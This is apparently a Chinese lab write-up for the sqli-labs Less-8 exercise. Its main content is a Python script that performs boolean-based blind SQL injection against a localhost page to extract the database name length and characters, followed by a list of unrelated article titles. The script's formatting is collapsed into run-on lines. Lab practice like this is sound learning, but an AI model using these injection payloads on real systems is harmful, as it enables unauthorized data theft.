Xss-labs 1-8以及利用python自动sq8注入

import requests# 目标URL
url = "http://127.0.0.1/sqli/Less-8/index.php"# 要推断的数据库信息（例如：数据库名）
database_name = ""# 字符集（可以根据需要扩展）
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "# 推断数据库名的长度def get_database_length():length = 0while True:length += 1payload = f"1' AND (SELECT length(database()) = {length}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:return lengthif length > 50:  # 防止无限循环breakreturn 0# 推断数据库名def get_database_name(length):db_name = ""for i in range(1, length + 1):left, right = 0, len(charset) - 1while left <= right:mid = (left + right) // 2char = charset[mid]payload = f"1' AND (SELECT substring(database(), {i}, 1) >= '{char}') -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:left = mid + 1else:right = mid - 1db_name += charset[right]return db_name# 主函数
if __name__ == "__main__":length = get_database_length()if length > 0:print(f"Database length: {length}")db_name = get_database_name(length)print(f"Database name: {db_name}")else:print("Failed to determine database length.")

相关文章：

linux cpu频率和AVS调压等级

板子 5.29--7.19

函数式编程和命令式编程

Python爬虫实战：研究psd-tools库相关技术

UI 程序退出卡顿问题分析：从真实案例深入理解退出清理路径负载问题

【工具变量】地级市城市包容性绿色增长数据（2011-2023年）

vue3使用KeepAlive组件及一些注意事项

[spring6: Advice Advisor Advised]-快速理解

基于深度学习的火灾智能检测系统设计与实现

零基础学习性能测试第二章-linux服务器监控：网络iftop

HTTP与HTTPS技术细节及TLS密钥交换与证书校验全流程

马走日题解

LeetCode Hot100【7. 整数反转】

MyBatis动态SQL全解析：五大核心标签实战指南

[每日随题11] 贪心 - 数学 - 区间DP

路由器内部电子元器件详解

C++数据结构————二叉树

模电基础-电压和电阻

RISC采用的3种流水技术的功能和区别分析

【官方】OneCode 3.0 核心技术白皮书：注解驱动、可视编码与 AI 融合

相角补偿全通滤波器设计：相位均衡（0~350Hz，15°超前）

关于如何同步开发板的时间和现在一样：

MyBatis分页神器PageHelper深度解析

【深度学习-Day 38】破解深度网络退化之谜：残差网络（ResNet）核心原理与实战

openmv小车追小球

如何设计一个软件项目管理系统：架构设计合集(六)

QGIS制作的仪表盘工程

Redisson RLocalCachedMap 核心参数详解

Python工厂方法模式详解：从理论到实战

Python绘制数据（三）